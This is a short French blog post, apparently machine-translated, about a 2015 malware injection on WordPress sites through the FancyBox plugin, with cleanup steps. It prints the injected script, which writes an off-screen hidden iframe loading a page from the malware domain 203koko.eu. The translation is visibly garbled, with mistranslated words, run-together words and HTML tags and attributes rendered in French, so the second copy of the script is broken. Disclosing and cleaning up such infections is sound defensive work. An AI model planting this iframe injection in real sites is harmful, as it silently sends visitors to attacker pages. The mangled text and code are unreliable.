En début de semaine, une série de sites et blogs avec WordPress, a reçu des avertissements de infection par un logiciel malveillant à travers Webmasters Google.
Le problème auquel Webmasters Google fait référence à la présence d'un morue / / scénario malware iframe dans les pages Web sources.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Il semble qu'il s'agisse d'un vulnérabilité un pluginacquérirFancyBox pour WordPress qui jusqu'à hier (05.02.2015) n'avait pas été mis à jour depuis longtemps.
Résoudre ce problème et désinfection des sites viraux avec ce malware, c'est relativement simple.
1. Désactivez le plugin FancyBox.
2. Supprimez tous les fichiers du plugin FancyBox du serveur (via FTP)
3. Installez la nouvelle version du plugin (FancyBox 3.0.4)
FancyBox pour WordPress 3.0.4
– Renommé le paramètre affecté par le problème de sécurité mentionné dans 3.0.3. Cela devrait empêcher le code malveillant d'apparaître sur les sites où le plugin est mis à jour sans supprimer le code malveillant.
FancyBox pour WordPress 3.0.3
– Correction d'un problème de sécurité.
Informations sur les logiciels malveillants :
TYPE : Redirection Iframe
CIBLE : WordPress Fancybox
DOMAINE DE MALWARE : 203koko.eu
URI DU MALWARE : http://203koko.eu/hjnfh/ipframe2.php
CODE BRUT DU LOGICIEL MALVEILLANT : <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” largeur=”20″ hauteur=”30″ ></iframe>
SCRIPT DE MALVEILLANT : <scénario>if (navigator.userAgent.match(/msie/i)) { document.write(‘ <style div=”position : absolue ; gauche : -2 000 px ; largeur : 2 000 px”>
Supprimez les logiciels malveillants de votre site WordPress.
